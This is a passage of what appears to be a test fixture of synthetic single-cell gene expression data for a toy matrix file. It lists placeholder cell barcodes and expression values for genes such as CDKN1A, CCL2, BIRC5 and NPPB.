"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"GSTT1 Expression": {
"name": "GSTT1 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.58,
2.81,
1.58,
3.0,
2.81,
1.58,
1.58,
2.58,
2.32,
2.81,
2.81,
2.58,
2.0,
2.58,
1.58,
2.0,
3.0,
1.58,
2.0,
2.81,
2.81,
1.58,
2.58,
1.58,
2.58,
1.0,
2.0,
2.58,
3.0,
1.58,
2.81,
2.58,
1.0,
2.81,
3.0,
1.58,
2.32,
1.58,
2.0,
2.32,
2.58,
2.32,
2.32,
2.58,
2.81,
2.81,
2.32,
2.32,
2.81,
2.58,
1.0,
2.58,
1.0,
1.58,
2.0,
3.0,
2.81,
1.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CDKN1A Cells": {
"name": "CDKN1A Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
"FoobarAB7_BazMoo_3ADABDACCCABBCBC-1",
"FoobarAB6_BazMoo_1ABAADCDCBDDACAB-1",
"FoobarAB3_BazMoo_7BDDDBCADACBDDBC-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB4_BazMoo_3ABCCABBCCCCBCDB-1",
"FoobarAB7_BazMoo_2CADCDBBDBBDDCBA-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB7_BazMoo_4ABDBBBACBCCBDAA-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB2_BazMoo_3DABAABDAAAABAAB-1",
"FoobarAB1_BazMoo_8CDCBDACDAAACBBD-1",
"FoobarAB8_BazMoo_4CBABCDBBDBCBCCA-1",
"FoobarAB7_BazMoo_3ACBCBCACACDBADD-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB1_BazMoo_8DCCDCBDADCCAACD-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB8_BazMoo_5CDDADACBAAACBAA-1",
"FoobarAB1_BazMoo_1CDBDADAAACBAABD-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB2_BazMoo_4CADDDCAADAADCAB-1",
"FoobarAB6_BazMoo_2CAADBDADABBDCCB-1",
"FoobarAB4_BazMoo_1DADCDAADADACBDD-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB5_BazMoo_5BBDADCDDCCABBDA-1",
"FoobarAB1_BazMoo_3DBBCDAABDACBCBB-1",
"FoobarAB2_BazMoo_1DDDBDCCBCBCACAA-1",
"FoobarAB7_BazMoo_8DACBBCACDACDCBA-1",
"FoobarAB2_BazMoo_8DBCDDCCAACDDDCB-1",
"FoobarAB4_BazMoo_1BCDCDADBDBCBDAD-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB1_BazMoo_7BDCABCBDAADCBBA-1",
"FoobarAB1_BazMoo_3BBCCABDADCDBCCB-1",
"FoobarAB7_BazMoo_5DAADBACDAADAABB-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB8_BazMoo_6DBAADCBDADCCDDB-1",
"FoobarAB7_BazMoo_5DBABDCBDCBADBCA-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB3_BazMoo_2CACAABACDBCBCBA-1",
"FoobarAB3_BazMoo_2DACDBDCAAAAACBB-1",
"FoobarAB6_BazMoo_6CACDAABBDDBCBDA-1",
"FoobarAB1_BazMoo_4CBCCBADBAABDDBB-1",
"FoobarAB1_BazMoo_8CBDADBABACDADAC-1",
"FoobarAB1_BazMoo_8DDCCAABADABCACC-1",
"FoobarAB3_BazMoo_6DDAABBCDBABACAA-1",
"FoobarAB7_BazMoo_1CADCBBCDCBDDDDD-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB1_BazMoo_2BDDDCADCACDDCBB-1",
"FoobarAB3_BazMoo_5DDBDBBBCBDBBBCD-1",
"FoobarAB3_BazMoo_8BDCBCBDCABACCCB-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
"FoobarAB8_BazMoo_6BDCBAACCCADDABB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CDKN1A Expression": {
"name": "CDKN1A Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.81,
3.0,
2.0,
2.32,
2.81,
2.58,
2.81,
2.58,
2.58,
2.58,
1.0,
3.0,
1.0,
1.0,
2.0,
1.0,
3.0,
3.0,
2.58,
1.0,
1.58,
1.0,
1.0,
2.32,
2.0,
1.58,
2.58,
1.58,
1.58,
2.81,
2.58,
2.58,
2.81,
2.58,
2.58,
2.81,
3.0,
2.58,
1.58,
1.58,
2.0,
1.58,
2.0,
2.58,
2.58,
2.32,
2.81,
2.58,
2.0,
2.58,
1.0,
1.58,
1.58,
3.0,
2.58,
1.58,
3.0,
2.58,
3.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"PON1 Cells": {
"name": "PON1 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
"FoobarAB7_BazMoo_4ADBADDCDCCADBDC-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB2_BazMoo_6ABBADACDCDDBCAC-1",
"FoobarAB8_BazMoo_6CBCADAABADDCCBC-1",
"FoobarAB5_BazMoo_8DCCCBAABDDBDDDA-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB2_BazMoo_3BBDDCADCDACDABD-1",
"FoobarAB3_BazMoo_2DACADABBDACCBDC-1",
"FoobarAB3_BazMoo_3CBBDAAACACCDDDA-1",
"FoobarAB2_BazMoo_2DCDCDBCBABDBBAD-1",
"FoobarAB4_BazMoo_3BBADCDAABADCAAB-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB1_BazMoo_3BCBBBCBCDDCBDAB-1",
"FoobarAB2_BazMoo_4CADDDCAADAADCAB-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB8_BazMoo_8ADAABACBACDDCAB-1",
"FoobarAB8_BazMoo_8DCDABCAADDBAABC-1",
"FoobarAB8_BazMoo_4BADABCDBDBDACAB-1",
"FoobarAB3_BazMoo_7DBDCDADBAAAABCD-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB7_BazMoo_5ADBBAAABBCCBABB-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB4_BazMoo_6DDACDDBBBAADBCC-1",
"FoobarAB7_BazMoo_8DACBBCACDACDCBA-1",
"FoobarAB7_BazMoo_3ADCADABBCDBBDDC-1",
"FoobarAB1_BazMoo_6BADACADACADCDDD-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
"FoobarAB8_BazMoo_2CCBCCBACABACCAB-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB5_BazMoo_8BCCCDBABCCADCAB-1",
"FoobarAB3_BazMoo_5ABDCBBDCDCACABB-1",
"FoobarAB3_BazMoo_3BCBCBABBDBCDCAA-1",
"FoobarAB4_BazMoo_7DDBDCACBACDBAAC-1",
"FoobarAB7_BazMoo_5DAADBACDAADAABB-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB8_BazMoo_6DBAADCBDADCCDDB-1",
"FoobarAB2_BazMoo_6BACDBCDDCCDADAB-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB8_BazMoo_2CCBABBDDADCCDBD-1",
"FoobarAB8_BazMoo_3DACBBDDBABDDDDD-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB4_BazMoo_1DCDCCCDBDBBABBB-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB7_BazMoo_1BBADABCABACDADC-1",
"FoobarAB2_BazMoo_5DCCBDBABBDACAAB-1",
"FoobarAB5_BazMoo_6DBCBCDABBADCCCB-1",
"FoobarAB1_BazMoo_4DDDCDCCABBDDABD-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB5_BazMoo_2DDBCCDBADBADCBC-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
"FoobarAB4_BazMoo_5CDCCABBCBACCCBC-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
"FoobarAB3_BazMoo_5DDBDBBBCBDBBBCD-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"PON1 Expression": {
"name": "PON1 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.81,
3.0,
2.0,
3.0,
1.0,
2.32,
1.58,
3.0,
2.58,
1.58,
1.0,
1.0,
2.81,
3.0,
2.0,
1.58,
1.58,
1.58,
2.32,
2.81,
2.32,
1.0,
2.81,
1.0,
2.0,
2.0,
2.58,
1.0,
3.0,
1.0,
2.0,
2.32,
2.0,
2.32,
2.58,
1.58,
3.0,
2.32,
2.81,
2.58,
1.0,
2.0,
2.0,
2.81,
2.0,
2.0,
2.58,
2.81,
2.32,
2.0,
2.32,
3.0,
2.32,
1.58,
1.58,
1.58,
3.0,
2.0,
1.58,
2.81,
3.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CCL2 Cells": {
"name": "CCL2 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB5_BazMoo_4BAABBACBDADDACA-1",
"FoobarAB5_BazMoo_5BBDADACAABADAAB-1",
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
"FoobarAB6_BazMoo_4CBDCBCDACADDDDA-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB6_BazMoo_7CBBCDBADBBBABDA-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB2_BazMoo_1AADDCCADACBADAD-1",
"FoobarAB7_BazMoo_5DAACACCCDADACBB-1",
"FoobarAB7_BazMoo_4ABDBBBACBCCBDAA-1",
"FoobarAB4_BazMoo_6CADCBCCBCDACDBD-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB1_BazMoo_8CDCBDACDAAACBBD-1",
"FoobarAB7_BazMoo_3ACBCBCACACDBADD-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB1_BazMoo_8DCCDCBDADCCAACD-1",
"FoobarAB1_BazMoo_1CDBDADAAACBAABD-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB5_BazMoo_3BDBBDDDDDBBABAC-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB6_BazMoo_2CAADBDADABBDCCB-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB4_BazMoo_6DDACDDBBBAADBCC-1",
"FoobarAB3_BazMoo_5ACABCDCBDAAACAD-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB6_BazMoo_1BCDADDDABDDBCDA-1",
"FoobarAB5_BazMoo_5CADADBDBDDCCADD-1",
"FoobarAB4_BazMoo_3DBCDBDBDCDDCCAB-1",
"FoobarAB5_BazMoo_1DCBBBBDACADABAA-1",
"FoobarAB4_BazMoo_6ABCCABADCCDBCAA-1",
"FoobarAB7_BazMoo_5DAADBACDAADAABB-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB3_BazMoo_4CABACABDCCCADCA-1",
"FoobarAB8_BazMoo_5DADAAABCBADCDCC-1",
"FoobarAB2_BazMoo_1CABADDBCABBCBBA-1",
"FoobarAB3_BazMoo_3DABBDCBDACACCCC-1",
"FoobarAB3_BazMoo_6DDAABBCDBABACAA-1",
"FoobarAB1_BazMoo_4DDDCDCCABBDDABD-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB8_BazMoo_7DCADDBDCBABCBCA-1",
"FoobarAB3_BazMoo_3BBCCDBADBABBDCA-1",
"FoobarAB6_BazMoo_4DAACBADBACABADC-1",
"FoobarAB3_BazMoo_8BDCBCBDCABACCCB-1",
"FoobarAB8_BazMoo_6BDCBAACCCADDABB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CCL2 Expression": {
"name": "CCL2 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.81,
1.58,
2.0,
1.58,
1.0,
1.0,
3.0,
2.0,
1.58,
2.0,
2.58,
1.0,
1.58,
2.32,
2.58,
2.0,
2.58,
2.0,
2.81,
3.0,
1.58,
3.0,
3.0,
2.0,
1.58,
1.0,
1.58,
2.32,
2.58,
1.58,
3.0,
1.0,
3.0,
1.0,
1.58,
2.58,
2.58,
2.32,
3.0,
1.58,
3.0,
2.0,
1.0,
1.58,
2.58,
1.0,
1.58,
1.0,
1.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"BIRC5 Cells": {
"name": "BIRC5 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB2_BazMoo_8DDACDAABBBBACDD-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB3_BazMoo_7BDDDBCADACBDDBC-1",
"FoobarAB8_BazMoo_4BDABCDCCBABACCC-1",
"FoobarAB7_BazMoo_4DDBADDACABDABDD-1",
"FoobarAB6_BazMoo_7CBBCDBADBBBABDA-1",
"FoobarAB7_BazMoo_2CADCDBBDBBDDCBA-1",
"FoobarAB2_BazMoo_1AADDCCADACBADAD-1",
"FoobarAB4_BazMoo_2ACAADBCBDDADADB-1",
"FoobarAB2_BazMoo_3BBDDCADCDACDABD-1",
"FoobarAB1_BazMoo_8CDCBDACDAAACBBD-1",
"FoobarAB7_BazMoo_3ACBCBCACACDBADD-1",
"FoobarAB5_BazMoo_3CBDBBABBAACABCD-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB4_BazMoo_3BBADCDAABADCAAB-1",
"FoobarAB1_BazMoo_5DDADDBCDDDCDABB-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB8_BazMoo_8ADAABACBACDDCAB-1",
"FoobarAB5_BazMoo_6AABBDADDABCDDCD-1",
"FoobarAB3_BazMoo_3BDBDACADBAADCCC-1",
"FoobarAB5_BazMoo_8ABDADBBCADAABDD-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB8_BazMoo_8DCDABCAADDBAABC-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB8_BazMoo_2CACAACCDBBBBBBB-1",
"FoobarAB6_BazMoo_4DACBDDDBDBDCADC-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB8_BazMoo_7CBCDDADACDDACAA-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB1_BazMoo_1BCCBCAADCCADCDB-1",
"FoobarAB3_BazMoo_2CDDCABDDCCACCBA-1",
"FoobarAB7_BazMoo_8DACBBCACDACDCBA-1",
"FoobarAB1_BazMoo_6BADACADACADCDDD-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB5_BazMoo_7AAABBCDCACCABAB-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
"FoobarAB6_BazMoo_1BCDADDDABDDBCDA-1",
"FoobarAB4_BazMoo_1BCDCDADBDBCBDAD-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB5_BazMoo_1DCBBBBDACADABAA-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB3_BazMoo_3BCBCBABBDBCDCAA-1",
"FoobarAB8_BazMoo_5CBBCCCADADDADDD-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB3_BazMoo_2CACAABACDBCBCBA-1",
"FoobarAB3_BazMoo_2DACDBDCAAAAACBB-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB3_BazMoo_2ADDBAAACCDDDDAA-1",
"FoobarAB1_BazMoo_8CBDADBABACDADAC-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB4_BazMoo_2CCACBADCCCCABAD-1",
"FoobarAB8_BazMoo_4BCABBACDAACCBCA-1",
"FoobarAB3_BazMoo_6DDAABBCDBABACAA-1",
"FoobarAB4_BazMoo_3BADBCDDABDDCDAB-1",
"FoobarAB5_BazMoo_2DDBCCDBADBADCBC-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"BIRC5 Expression": {
"name": "BIRC5 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
3.0,
2.81,
2.32,
2.58,
2.81,
1.58,
2.58,
1.0,
2.0,
3.0,
2.0,
3.0,
2.32,
3.0,
1.0,
2.0,
3.0,
2.58,
2.58,
2.0,
1.58,
1.58,
3.0,
2.32,
2.32,
2.32,
1.58,
2.0,
2.0,
2.81,
2.32,
2.32,
1.58,
2.32,
2.58,
2.58,
2.0,
2.81,
1.0,
1.58,
2.81,
2.0,
2.0,
2.58,
2.81,
2.32,
2.32,
2.81,
2.81,
1.0,
2.0,
1.58,
2.32,
1.58,
2.0,
2.58,
3.0,
2.58,
2.58,
3.0,
2.32,
1.0,
2.32,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"NPPB Cells": {
"name": "NPPB Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB5_BazMoo_5BBDADACAABADAAB-1",
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB2_BazMoo_7DBCCABABACABBBD-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB6_BazMoo_4CBDCBCDACADDDDA-1",
"FoobarAB7_BazMoo_4ADBADDCDCCADBDC-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB6_BazMoo_1ABAADCDCBDDACAB-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB7_BazMoo_1DBAACCBDDDCBCDB-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB5_BazMoo_3DADDDCACDABCDCB-1",
"FoobarAB7_BazMoo_5BADDCDBCDDBCDAA-1",
"FoobarAB6_BazMoo_3CDCABAAADCACCBA-1",
"FoobarAB2_BazMoo_2DDCCBAACDCCADBB-1",
"FoobarAB1_BazMoo_3DCABADBDAADDCBD-1",
"FoobarAB8_BazMoo_4CBABCDBBDBCBCCA-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB8_BazMoo_8CDBBCCBBAADAAAC-1",
"FoobarAB2_BazMoo_8DDABDBCDABBBDAA-1",
"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB5_BazMoo_3BDBBDDDDDBBABAC-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB2_BazMoo_4CADDDCAADAADCAB-1",
"FoobarAB6_BazMoo_2CAADBDADABBDCCB-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB3_BazMoo_3BDBDACADBAADCCC-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB8_BazMoo_2CACAACCDBBBBBBB-1",
"FoobarAB3_BazMoo_8CBDABBAAAAADBCD-1",
"FoobarAB2_BazMoo_1DDDBDCCBCBCACAA-1",
"FoobarAB4_BazMoo_8DCDBDACADABCDDB-1",
"FoobarAB3_BazMoo_6DDDCDCADCCDBCBB-1",
"FoobarAB7_BazMoo_8DCBCBBACADBBBAC-1",
"FoobarAB5_BazMoo_6BCBABACCCDACDBB-1",
"FoobarAB2_BazMoo_7CDBDADBACBAAAAC-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB2_BazMoo_8CCACCBDCBCDABAD-1",
"FoobarAB3_BazMoo_3BCBCBABBDBCDCAA-1",
"FoobarAB8_BazMoo_6DBAADCBDADCCDDB-1",
"FoobarAB2_BazMoo_5CAAADCADACBDDCA-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB3_BazMoo_4BBBAABCBAACCBAC-1",
"FoobarAB4_BazMoo_3BCADDCAAACBADBC-1",
"FoobarAB6_BazMoo_8DCBCBCBCDCBADBA-1",
"FoobarAB8_BazMoo_3DACBBDDBABDDDDD-1",
"FoobarAB5_BazMoo_2ACDDDDADBCDDDCA-1",
"FoobarAB7_BazMoo_2BACDBDDBCACABDD-1",
"FoobarAB2_BazMoo_5ADDADBBABBDCCAC-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB7_BazMoo_1BBADABCABACDADC-1",
"FoobarAB4_BazMoo_2CCACBADCCCCABAD-1",
"FoobarAB1_BazMoo_8DDCCAABADABCACC-1",
"FoobarAB4_BazMoo_1CCACCABBBDABDCB-1",
"FoobarAB7_BazMoo_1CADCBBCDCBDDDDD-1",
"FoobarAB3_BazMoo_8AAABDDBDDCBDDAB-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
"FoobarAB3_BazMoo_5DDBDBBBCBDBBBCD-1",
"FoobarAB3_BazMoo_3BBCCDBADBABBDCA-1",
"FoobarAB3_BazMoo_4CAAACBDCBCBBBCA-1",
"FoobarAB2_BazMoo_3BCDCBCCBCCCCBAC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"NPPB Expression": {
"name": "NPPB Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
3.0,
2.81,
3.0,
1.0,
1.0,
2.58,
2.32,
2.81,
2.0,
1.58,
2.81,
2.32,
2.81,
2.32,
2.81,
1.0,
3.0,
2.81,
2.0,
2.58,
2.81,
3.0,
2.81,
2.32,
2.0,
3.0,
2.81,
2.81,
3.0,
2.81,
1.0,
2.0,
2.32,
2.58,
1.0,
2.58,
2.58,
2.81,
3.0,
3.0,
2.0,
2.32,
2.81,
1.0,
2.58,
3.0,
1.0,
3.0,
2.81,
2.32,
2.32,
2.32,
3.0,
2.58,
2.81,
1.58,
1.0,
3.0,
2.58,
2.0,
2.32,
2.32,
3.0,
2.81,
3.0,
1.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"F2 Cells": {
"name": "F2 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB5_BazMoo_5BBDADACAABADAAB-1",
"FoobarAB3_BazMoo_6AACDDCDACBCBACD-1",
"FoobarAB8_BazMoo_4BDABCDCCBABACCC-1",
"FoobarAB2_BazMoo_6ABBADACDCDDBCAC-1",
"FoobarAB7_BazMoo_4DDBADDACABDABDD-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB5_BazMoo_8DCCCBAABDDBDDDA-1",
"FoobarAB7_BazMoo_6ABADABDAABBCDDB-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB5_BazMoo_8BAADDAAACABBCBD-1",
"FoobarAB8_BazMoo_7CCACACCBDDBBCBB-1",
"FoobarAB8_BazMoo_8CDBBCCBBAADAAAC-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB2_BazMoo_8DDABDBCDABBBDAA-1",
"FoobarAB7_BazMoo_5CBDCCDBCDBCDCCC-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB1_BazMoo_1CDBDADAAACBAABD-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB1_BazMoo_5DDADDBCDDDCDABB-1",
"FoobarAB8_BazMoo_6CADDCBBACDDBACB-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB8_BazMoo_4BADABCDBDBDACAB-1",
"FoobarAB8_BazMoo_2CACAACCDBBBBBBB-1",
"FoobarAB3_BazMoo_7DBDCDADBAAAABCD-1",
"FoobarAB1_BazMoo_3DBBCDAABDACBCBB-1",
"FoobarAB4_BazMoo_8DCDBDACADABCDDB-1",
"FoobarAB7_BazMoo_8DCBDADACBABCCCC-1",
"FoobarAB3_BazMoo_5ACABCDCBDAAACAD-1",
"FoobarAB2_BazMoo_8DBCDDCCAACDDDCB-1",
"FoobarAB5_BazMoo_6BCBABACCCDACDBB-1",
"FoobarAB5_BazMoo_3CDAABAABBACAAAC-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB4_BazMoo_2AABBAAABCBBACBB-1",
"FoobarAB2_BazMoo_8CCACCBDCBCDABAD-1",
"FoobarAB1_BazMoo_3BBCCABDADCDBCCB-1",
"FoobarAB6_BazMoo_3DBACDBDAAADABDB-1",
"FoobarAB6_BazMoo_8DCBCBCBCDCBADBA-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB3_BazMoo_2CACAABACDBCBCBA-1",
